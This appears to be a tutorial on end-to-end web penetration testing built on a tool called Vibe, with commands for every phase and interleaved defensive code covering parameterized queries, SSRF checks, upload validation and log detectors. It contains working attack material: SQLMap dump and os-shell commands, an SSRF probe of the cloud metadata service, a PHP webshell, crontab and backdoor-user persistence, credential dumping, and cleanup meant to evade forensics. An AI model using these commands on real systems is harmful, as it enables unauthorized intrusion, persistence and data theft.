Real‑World: End‑to‑End Penetration Testing

Vibe Prompt

“Plan a comprehensive web penetration test: from information gathering, vulnerability scanning, exploitation, to shell acquisition.”

Full Workflow Overview

Phase 1 – Reconnaissance (1–2 days)
├── OSINT (domain, email, subdomains)
├── Technology Stack Identification
├── Port Scanning (Nmap)
└── Directory Enumeration (Gobuster, Dirb)

Phase 2 – Vulnerability Scanning (1–2 days)
├── Nessus / OpenVAS
├── OWASP ZAP
├── Nikto
└── Nuclei

Phase 3 – Exploitation (2–3 days)
├── SQL Injection (SQLMap)
├── XSS (manual verification)
├── File Upload Bypass
├── SSRF
├── Insecure Direct Object References (IDOR)
└── Privilege Escalation

Phase 4 – Post‑Exploitation (1 day)
├── Webshell Deployment
├── Persistence
├── Lateral Movement
├── Sensitive Data Collection
└── Cleanup & Takedown

Phase 5 – Reporting (1–2 days)
├── Vulnerability Summary
├── Risk Rating (CVSS)
├── Remediation Guidance
└── Appendix (Payloads, Screenshots)

What?

This workflow is a repeatable process that covers every stage of a penetration test. It ensures that no critical step (reconnaissance, scanning, exploitation, post‑exploitation, or reporting) is omitted.

Why?

For developers and founders, a structured approach reduces the risk of costly security incidents. It also demonstrates compliance with industry standards (e.g., OWASP ASVS, NIST SP 800‑115) and can be a selling point for security‑centric customers. A well‑documented test can lower insurance premiums and provide a clear ROI by preventing data breaches that could cost millions.

How?

Using Vibe Coding, you can automate many of these steps, integrate them into CI/CD pipelines, and generate reproducible reports. Below we detail each phase with commands, tools, and Vibe‑specific scripts.


Phase 1 – Reconnaissance

1.1 OSINT

| Tool | Purpose | Vibe Integration |
|------|---------|------------------|
| theHarvester | Gather emails, subdomains, hosts | vibe run theHarvester -d target.com -b all -l 1000 |
| crt.sh | Discover certificates for subdomains | vibe run crt.sh -d target.com |
| dnsdumpster | DNS enumeration | vibe run dnsdumpster -d target.com |

Why?
Early discovery of the attack surface limits the scope of the test and ensures you focus on real assets.

How?
Create a Vibe task file recon.yml:

tasks:
  - name: Gather subdomains
    command: theHarvester -d target.com -b all -l 1000
  - name: Certificate enumeration
    command: crt.sh -d target.com
  - name: DNS dump
    command: dnsdumpster -d target.com

Run with vibe run recon.yml.

1.2 Technology Stack Identification

| Tool | Purpose | Vibe Integration |
|------|---------|------------------|
| WhatWeb | Detect web server, CMS, frameworks | vibe run whatweb -a 3 target.com |
| Wappalyzer | Browser extension or CLI | vibe run wappalyzer target.com |

Why?
Knowing the stack informs which vulnerability libraries and exploits are relevant.

How?
Add to recon.yml:

  - name: Detect stack
    command: whatweb -a 3 target.com

1.3 Port Scanning (Nmap)

# Full scan
nmap -sV -sC -O -A -p- -T4 target.com -oA nmap_report

# Parameters explained
# -sV: Service/version detection
# -sC: Default scripts
# -O: OS detection
# -A: Aggressive scan (includes OS, version, script, traceroute)
# -p-: Scan all 65535 ports
# -T4: Aggressive timing
# -oA: Output in all formats (xml, nmap, grepable)

Why?
Open ports reveal potential entry points and help prioritize scanning.

How?
Create a Vibe task:

  - name: Nmap full scan
    command: nmap -sV -sC -O -A -p- -T4 target.com -oA nmap_report

1.4 Directory Enumeration (Gobuster)

gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50
gobuster vhost -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 30

Why?
Hidden directories often host admin panels, API endpoints, or legacy services.

How?
Add to Vibe:

  - name: Gobuster directory
    command: gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50
  - name: Gobuster vhost
    command: gobuster vhost -u https://target.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 30

Phase 2 – Vulnerability Scanning

2.1 Nessus / OpenVAS

| Tool | Purpose | Vibe Integration |
|------|---------|------------------|
| Nessus | Comprehensive vulnerability scanner | vibe run nessus -s target.com |
| OpenVAS | Open‑source alternative | vibe run openvas -s target.com |

Why?
Automated scanners surface known CVEs, misconfigurations, and missing patches.

How?
Define a Vibe task:

  - name: Nessus scan
    command: nessus -s target.com

2.2 OWASP ZAP

zap.sh -daemon -port 8090 -config api.disablekey=true

Why?
ZAP is ideal for dynamic web application testing, especially for APIs.

How?
Create a Vibe task:

  - name: Start ZAP
    command: zap.sh -daemon -port 8090 -config api.disablekey=true

2.3 Nikto

nikto -h https://target.com -o nikto_report.txt

Why?
Nikto checks for outdated software, default files, and common misconfigurations.

How?
Vibe task:

  - name: Nikto scan
    command: nikto -h https://target.com -o nikto_report.txt

2.4 Nuclei

nuclei -u https://target.com -t nuclei-templates/ -o nuclei_report.txt

Why?
Nuclei uses a large template library for quick detection of known vulnerabilities.

How?
Vibe task:

  - name: Nuclei scan
    command: nuclei -u https://target.com -t nuclei-templates/ -o nuclei_report.txt

Phase 3 – Exploitation

3.1 SQL Injection (SQLMap)

# Basic injection
sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=2

# List databases
sqlmap -u "https://target.com/products?id=1" --batch --dbs

# List tables in a database
sqlmap -u "https://target.com/products?id=1" --batch -D mydb --tables

# Dump a table
sqlmap -u "https://target.com/products?id=1" --batch -D mydb -T users --dump

# Get OS shell
sqlmap -u "https://target.com/products?id=1" --batch --os-shell

Why?
SQL injection can lead to data exfiltration, privilege escalation, or remote code execution.

How?
Wrap each command in a Vibe task:

  - name: SQLMap basic
    command: sqlmap -u "https://target.com/products?id=1" --batch --level=3 --risk=2
  - name: SQLMap dump users
    command: sqlmap -u "https://target.com/products?id=1" --batch -D mydb -T users --dump
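
The root cause SQLMap is probing for, and the remediation the report template later asks for (parameterized queries plus input validation), shown side by side. This is an added example, not code from the page or the Vibe project; the in-memory SQLite table standing in for the products backend is constructed here.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the backend behind /api/products."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, public INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "widget", 1), (2, "gadget", 1), (3, "internal-sku", 0)],
    )
    return conn


def lookup_vulnerable(conn, product_id):
    # The defect behind finding H-01: the request parameter is spliced into the
    # SQL text, so the database cannot distinguish data from query structure and
    # the "public = 1" restriction can be switched off by the caller.
    query = f"SELECT name FROM products WHERE public = 1 AND id = {product_id} ORDER BY id"
    return [row[0] for row in conn.execute(query)]


def lookup_fixed(conn, product_id):
    # The remediation: validate the type first, then bind the value through a
    # placeholder so it can only ever be compared as an integer.
    if not str(product_id).isdigit():
        raise ValueError("id must be a positive integer")
    query = "SELECT name FROM products WHERE public = 1 AND id = ? ORDER BY id"
    return [row[0] for row in conn.execute(query, (int(product_id),))]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, "1 OR 1=1"))  # leaks the non-public row
    print("fixed:", lookup_fixed(db, "1"))
```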

3.2 Cross‑Site Scripting (XSS)

| Technique | Tool | Vibe Integration |
|-----------|------|------------------|
| Reflected XSS | Burp Intruder | vibe run burp_intruder -t target.com -p /search?q=... |
| Stored XSS | Manual injection | vibe run curl -X POST -d "comment=...<script>alert(1)</script>" https://target.com/api/comments |

Why?
XSS can hijack sessions, deface sites, or execute arbitrary scripts.

How?
Create a Vibe task for Burp Intruder:

  - name: Burp Intruder XSS
    command: burp_intruder -t target.com -p /search?q=... -payload "<script>alert(1)</script>"

3.3 File Upload Bypass

| Vulnerability | Exploit | Vibe Integration |
|---------------|---------|------------------|
| MIME type mismatch | Upload a PHP file disguised as image | vibe run curl -F "file=@/tmp/shell.php" https://target.com/upload |
| Directory traversal | ../../../../etc/passwd | vibe run curl -F "file=@/etc/passwd" https://target.com/upload |

Why?
A successful bypass allows arbitrary code execution on the server.

How?
Vibe task:

  - name: File upload bypass
    command: curl -F "file=@/tmp/shell.php" https://target.com/upload

3.4 Server‑Side Request Forgery (SSRF)

curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" https://target.com/api/ssrf

Why?
SSRF can access internal services, leak secrets, or pivot to other hosts.

How?
Vibe task:

  - name: SSRF test
    command: curl -X POST -d "url=http://169.254.169.254/latest/meta-data/" https://target.com/api/ssrf
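
What the /api/ssrf endpoint should have done with the url parameter before fetching it: allow only http/https, resolve the host, and refuse any address that is link-local (the 169.254.169.254 metadata service), private, or loopback. This is an added example, not code from the page or the Vibe project; the resolver parameter is a hypothetical hook so the check can be tested with constructed DNS answers.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def is_public_address(ip_text):
    """True only for globally routable addresses; metadata, RFC1918 and loopback fail."""
    ip = ipaddress.ip_address(ip_text)
    if getattr(ip, "ipv4_mapped", None) is not None:  # ::ffff:10.0.0.5 style literals
        ip = ip.ipv4_mapped
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url, resolver=socket.gethostbyname_ex):
    """Return (allowed, reason, addresses).

    The caller must connect only to the returned addresses, not re-resolve the
    name: a second DNS answer could otherwise swap in an internal address
    (DNS rebinding) after the check has passed.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme '{parts.scheme}' not allowed", []
    host = parts.hostname
    if not host:
        return False, "missing host", []
    try:
        ipaddress.ip_address(host)          # literal IP in the URL
        addresses = [host]
    except ValueError:
        try:
            addresses = resolver(host)[2]   # (name, aliases, ipaddrlist)
        except OSError:
            return False, "name resolution failed", []
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{addr} is not a public address", []
    return True, "ok", addresses


if __name__ == "__main__":
    print(check_outbound_url("http://169.254.169.254/latest/meta-data/"))
```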

3.5 Insecure Direct Object References (IDOR)

curl -X GET https://target.com/api/users/123
curl -X GET https://target.com/api/users/124

Why?
IDOR lets an attacker read or modify data belonging to other users.

How?
Vibe task:

  - name: IDOR test
    command: |
      for id in 123 124 125; do
        curl -X GET https://target.com/api/users/$id
      done
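
The defender's view of the loop above: a check that reads web server access logs and flags any client that pulls several distinct /api/users/<id> objects in a short window, which is the signature sequential-ID enumeration leaves behind. This is an added example, not code from the page or the Vibe project; the log lines are constructed in combined-log style, and the window and threshold are assumptions to tune per application.

```python
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
OBJECT_RE = re.compile(r"^/api/users/(\d+)$")

# Constructed sample log: one client walks three consecutive user ids,
# another makes ordinary requests.
SAMPLE_LOG = """\
203.0.113.7 - alice [30/Jun/2026:10:15:01 +0000] "GET /api/users/123 HTTP/1.1" 200 512
203.0.113.7 - alice [30/Jun/2026:10:15:02 +0000] "GET /api/users/124 HTTP/1.1" 200 498
203.0.113.7 - alice [30/Jun/2026:10:15:03 +0000] "GET /api/users/125 HTTP/1.1" 200 503
198.51.100.9 - bob [30/Jun/2026:10:20:44 +0000] "GET /api/users/7 HTTP/1.1" 200 510
198.51.100.9 - bob [30/Jun/2026:10:20:45 +0000] "GET /api/products?id=1 HTTP/1.1" 200 2048
""".splitlines()


def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_enumeration(lines, window_seconds=60, min_ids=3):
    """Return {(ip, user): sorted object ids} for clients that successfully
    fetched at least min_ids distinct user objects within window_seconds."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec is None or rec["status"] != "200":
            continue
        m = OBJECT_RE.match(rec["path"])
        if m:
            hits[(rec["ip"], rec["user"])].append((rec["ts"], int(m.group(1))))
    alerts = {}
    for key, events in hits.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ids = {oid for t, oid in events[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(ids) >= min_ids:
                alerts[key] = sorted(ids)
                break
    return alerts
```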

3.6 Privilege Escalation

# Linux PE script
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

# Common checks
sudo -l
find / -perm -4000 2>/dev/null
cat /etc/crontab
uname -a
cat /etc/os-release

Why?
Even if initial access is limited, privilege escalation can grant full control.

How?
Create a Vibe task:

  - name: Run linPEAS
    command: |
      wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh
      chmod +x linpeas.sh
      ./linpeas.sh

Phase 4 – Post‑Exploitation

4.1 Webshell Deployment

| Tool | Payload | Vibe Integration |
|------|---------|------------------|
| PHP | <?php system($_GET['cmd']); ?> | vibe run curl -F "file=@/tmp/shell.php" https://target.com/upload |
| Node.js | require('child_process').execSync(process.argv[2]) | vibe run curl -F "file=@/tmp/shell.js" https://target.com/upload |

Why?
A webshell provides a persistent command interface for further exploitation.

How?
Vibe task:

  - name: Deploy PHP webshell
    command: curl -F "file=@/tmp/shell.php" https://target.com/upload
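
The server-side validation that stops both the 3.3 upload bypass and the 4.1 webshell deployment: an extension allowlist, a magic-byte check that the content really is that file type, a declared-MIME cross-check, rejection of path components in the filename, and a generated name for storage so the client never controls where or as what the file lands. This is an added example, not code from the page or the Vibe project; the allowlist is an assumption for an image-only upload endpoint.

```python
import secrets
from pathlib import PurePosixPath

# Extension allowlist with the magic bytes and MIME type each must carry (assumed policy).
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "gif": (b"GIF8", "image/gif"),
}


def validate_upload(filename, declared_mime, data):
    """Return (accepted, reason) for one multipart file part (hypothetical helper)."""
    name = PurePosixPath(filename).name
    if name != filename or name.startswith("."):
        # "../../../../etc/passwd" style names are rejected outright rather than sanitized.
        return False, "filename contains path components"
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED:
        return False, f"extension '{ext}' not in allowlist"
    magic, mime = ALLOWED[ext]
    if not data.startswith(magic):
        # shell.php renamed to shell.png fails here: the bytes are not an image.
        return False, "file content does not match its extension"
    if declared_mime != mime:
        return False, "declared MIME type does not match extension"
    return True, "ok"


def stored_name(ext):
    # Never keep the client-supplied name. Store under a random name with the
    # validated extension, outside the web root, served with a fixed Content-Type,
    # so nothing that was uploaded is ever handed to an interpreter.
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    print(validate_upload("shell.php", "image/png", b"<?php system($_GET['cmd']); ?>"))
    print(validate_upload("logo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16))
```

A polyglot file that is a valid image and also carries script text still passes the magic check, which is why the generated name, out-of-web-root storage and no-execute serving matter more than the content checks.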

4.2 Persistence

  • Create a cron job that re‑uploads the shell.
  • Add a new user with sudo privileges.

Why?
Ensures continued access even after remediation.

How?
Vibe tasks:

  - name: Add cron job
    command: echo "* * * * * root /usr/bin/curl -F 'file=@/tmp/shell.php' https://target.com/upload" >> /etc/crontab
  - name: Add privileged user
    command: useradd -m -s /bin/bash attacker && echo "attacker:password" | chpasswd && usermod -aG sudo attacker
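
Both persistence mechanisms above are visible to a defender who watches two files: system crontab entries whose command uploads or fetches over the network, and changes in sudo group membership against a known baseline. This is an added example, not code from the page or the Vibe project; the crontab text and group file lines are constructed, and the cron heuristics are assumptions to extend per environment.

```python
import re

# Patterns worth flagging in /etc/crontab commands (assumed heuristics).
CRON_FLAGS = [
    (re.compile(r"\bcurl\b.*\s-F\s"), "curl upload (-F) from a cron job"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "download piped to a shell"),
    (re.compile(r"\bnc\b|\bncat\b|/dev/tcp/"), "raw network tool in cron"),
]
# System crontab lines carry a user field between the schedule and the command.
SYSTEM_CRON_RE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root /usr/bin/curl -F 'file=@/tmp/shell.php' https://target.com/upload
"""


def suspicious_cron_entries(crontab_text):
    """Return [(line number, user, reason)] for entries matching CRON_FLAGS."""
    findings = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:  # blank, comment, env line
            continue
        m = SYSTEM_CRON_RE.match(s)
        if not m:
            continue
        for pattern, why in CRON_FLAGS:
            if pattern.search(m.group("cmd")):
                findings.append((lineno, m.group("user"), why))
                break
    return findings


def new_sudo_members(baseline_group_file, current_group_file):
    """Accounts present in the sudo/wheel group now but absent from the baseline copy."""
    def members(text):
        for line in text.splitlines():
            fields = line.split(":")
            if len(fields) == 4 and fields[0] in ("sudo", "wheel"):
                return {m for m in fields[3].split(",") if m}
        return set()
    return sorted(members(current_group_file) - members(baseline_group_file))
```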

4.3 Lateral Movement

  • Enumerate other hosts via nmap -sP 10.0.0.0/24.
  • Exploit SMB shares or SSH keys.

Why?
Expands the attack surface and can reach critical assets.

How?
Vibe task:

  - name: Scan internal network
    command: nmap -sP 10.0.0.0/24 -oG internal_hosts.txt

4.4 Sensitive Data Collection

  • Dump database credentials.
  • Retrieve API keys from environment variables.

Why?
Data exfiltration is the primary business impact of a breach.

How?
Vibe task:

  - name: Dump credentials
    command: cat /etc/credentials.txt

4.5 Cleanup & Takedown

  • Delete uploaded files.
  • Remove cron jobs and users.

Why?
Leaves no trace for forensic analysis.

How?

  - name: Remove webshell
    command: rm -f /var/www/html/shell.php
  - name: Delete user
    command: userdel -r attacker

Phase 5 – Reporting

5.1 Report Template (Markdown)

# Penetration Test Report

## Executive Summary
- **Target:** https://vibe-tutor.com
- **Scope:** Full web application and API surface
- **Duration:** 2026‑06‑30 to 2026‑07‑02
- **Findings:** 7 vulnerabilities (High: 2, Medium: 3, Low: 2)
- **Average CVSS:** 7.2

## High‑Risk Vulnerabilities

### H‑01: SQL Injection in /api/products
- **Description:** Unsanitized `id` parameter allows SQL injection.
- **CVSS:** 9.1 (Critical)
- **Evidence:** SQLMap successfully dumped `users` table.
- **Remediation:** Implement parameterized queries and input validation.

### H‑02: Broken Access Control in /api/admin
- **Description:** No authentication for admin endpoints.
- **CVSS:** 8.2 (High)
- **Evidence:** Direct access to `/api/admin/users` returned all user data.
- **Remediation:** Add role‑based middleware and enforce JWT validation.

## Medium‑Risk Vulnerabilities
... (details omitted for brevity)

## Low‑Risk Vulnerabilities
... (details omitted for brevity)

## Appendix
- **Payloads:** List of all payloads used.
- **Screenshots:** Attach relevant screenshots.
- **Logs:** Include scan logs and exploitation outputs.

5.2 How to Generate the Report with Vibe

Create a Vibe task:

  - name: Generate report
    command: |
      echo "# Penetration Test Report" > report.md
      echo "## Executive Summary" >> report.md
      # Append findings programmatically

You can automate the insertion of findings by parsing scan outputs and rendering them with a templating engine such as Jinja2 within Vibe.
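
A generator for the 5.1 template that takes findings as one JSON object per line, files them into the High/Medium/Low sections, labels each with its CVSS v3 qualitative rating and computes the executive-summary counts and average. This is an added example, not code from the page or the Vibe project; it uses only the standard library rather than Jinja2, and the findings are constructed, not real scanner output.

```python
import json
from collections import Counter

# Constructed findings in the shape a scan-parsing step would hand over.
FINDINGS_JSONL = """\
{"id": "H-01", "title": "SQL Injection in /api/products", "cvss": 9.1, "remediation": "Use parameterized queries and validate the id parameter."}
{"id": "H-02", "title": "Broken Access Control in /api/admin", "cvss": 8.2, "remediation": "Add role-based middleware and enforce JWT validation."}
{"id": "M-01", "title": "Missing security headers", "cvss": 5.3, "remediation": "Set CSP, HSTS and X-Content-Type-Options."}
{"id": "M-02", "title": "Verbose error pages", "cvss": 4.3, "remediation": "Disable debug output in production."}
{"id": "L-01", "title": "Server version disclosure", "cvss": 3.1, "remediation": "Suppress the Server header."}
"""


def rating(cvss):
    """CVSS v3.x qualitative rating used for the per-finding label."""
    if cvss >= 9.0: return "Critical"
    if cvss >= 7.0: return "High"
    if cvss >= 4.0: return "Medium"
    return "Low"


def section(cvss):
    """Report section; Critical findings are filed under High-Risk, as in the template."""
    return "High" if cvss >= 7.0 else rating(cvss)


def load_findings(jsonl_text):
    return [json.loads(line) for line in jsonl_text.splitlines() if line.strip()]


def render_report(findings, target, start, end):
    counts = Counter(section(f["cvss"]) for f in findings)
    avg = round(sum(f["cvss"] for f in findings) / len(findings), 1) if findings else 0.0
    summary = ", ".join(f"{s}: {counts[s]}" for s in ("High", "Medium", "Low") if counts[s])
    lines = ["# Penetration Test Report", "", "## Executive Summary",
             f"- **Target:** {target}", f"- **Duration:** {start} to {end}",
             f"- **Findings:** {len(findings)} vulnerabilities ({summary})",
             f"- **Average CVSS:** {avg}", ""]
    for sev in ("High", "Medium", "Low"):
        group = sorted((f for f in findings if section(f["cvss"]) == sev), key=lambda f: -f["cvss"])
        if not group:
            continue
        lines += [f"## {sev}-Risk Vulnerabilities", ""]
        for f in group:
            lines += [f"### {f['id']}: {f['title']}",
                      f"- **CVSS:** {f['cvss']} ({rating(f['cvss'])})",
                      f"- **Remediation:** {f['remediation']}", ""]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_report(load_findings(FINDINGS_JSONL), "https://vibe-tutor.com", "2026-06-30", "2026-07-02"))
```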
